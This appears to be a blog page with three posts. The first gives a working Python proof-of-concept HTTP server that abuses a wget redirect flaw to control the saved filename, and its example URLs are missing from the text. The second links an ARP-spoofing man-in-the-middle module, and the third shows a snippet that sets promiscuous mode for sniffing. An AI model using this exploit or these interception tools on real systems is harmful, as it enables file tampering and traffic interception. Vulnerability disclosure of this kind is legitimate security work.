WGET file redirect exploit

While browsing full-disclosure this morning I noticed a vulnerability in WGET and decided to write a working exploit for it to show the issue.

The problem is, if you request a file, for example:
and the server returns a redirect to say
WGET will store the downloaded file with the filename of ‘malicious_filename’ !
Exploit code to test if your system is vulnerable:

import BaseHTTPServer;
import time
import sys

HOST_NAME = "0.0.0.0"
PORT_NUMBER = 80

TARGET_FILENAME = ".pwned"
TARGET_CONTENT = "VULNERABLE SYSTEM"

class wget_exploit(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
if self.path != "/%s" % (TARGET_FILENAME):
# do our redirect
self.send_response(301) # send the redirect
self.send_header("Location", TARGET_FILENAME) # redirect to the target
self.end_headers()

self.wfile.write("WOOPSPLOIT by XPN (http://xpnsbraindump.blogspot.com)")

else:
# send exploited file with new filename
self.send_response(200)
self.end_headers()

self.wfile.write(TARGET_CONTENT)


if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), wget_exploit)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass

httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)

Advertisements

Man In The Middle Python Module

Finally I have finished my first python project. I have created a little module that will allow any python programmer to intercept IP traffic between a host and router on the same subnet using ARP spoofing.

This is my first python project, so please any criticisms/comments or feedback (as long as constructive) I would be happy to receive.

If you like this, please comment.

Link: http://github.com/xpn/mitm

Python: Add Promiscuous Mode To Interface

So.. I started programming in python this weekend. I’ve touched on it before but never really gave it a fair chance. I was looking for a while on how to set an interface into promiscuous mode for some arp spoofing tool that i’m creating and while searching couldn’t really find anything….

so here is my little snippet for anyone looking to do the same thing:

import socket;
import struct;
import fcntl;

SIOCGIFFLAGS = 0x8913;
SIOCSIFFLAGS = 0x8914;
IFF_PROMISC = 0x100;

current_flags = 0;

sd = socket.socket(socket.PF_PACKET, socket.SOCK_RAW);

# This will return the current flags present on the interface
ifreq = fcntl.ioctl(sd, SIOCGIFFLAGS, “eth0” + “” * 256);

# extract current flags field from struct returned
(current_flags,) = struct.unpack(“16xH”, ifreq[:18]);

# add the Promisc flag
current_flags |= IFF_PROMISC;

# create the new struct for setting the interface flags
ifreq = struct.pack(“4s12xH”, “eth0”, current_flags);

# call ioctl() to update the flags for the interface
fcntl.ioctl(sd, SIOCSIFFLAGS, ifreq);

# Turn off the IFF_PROMISC flag
current_flags ^= IFF_PROMISC;
ifreq = struct.pack(“4s12xH”, “eth0”, current_flags);

# remove the Promisc flag from the interface once done
fcntl.ioctl(sd, SIOCSIFFLAGS, ifreq);

If you think of any other ways to do the above in a more ‘clean’ format, please leave a comment as I would love to know how.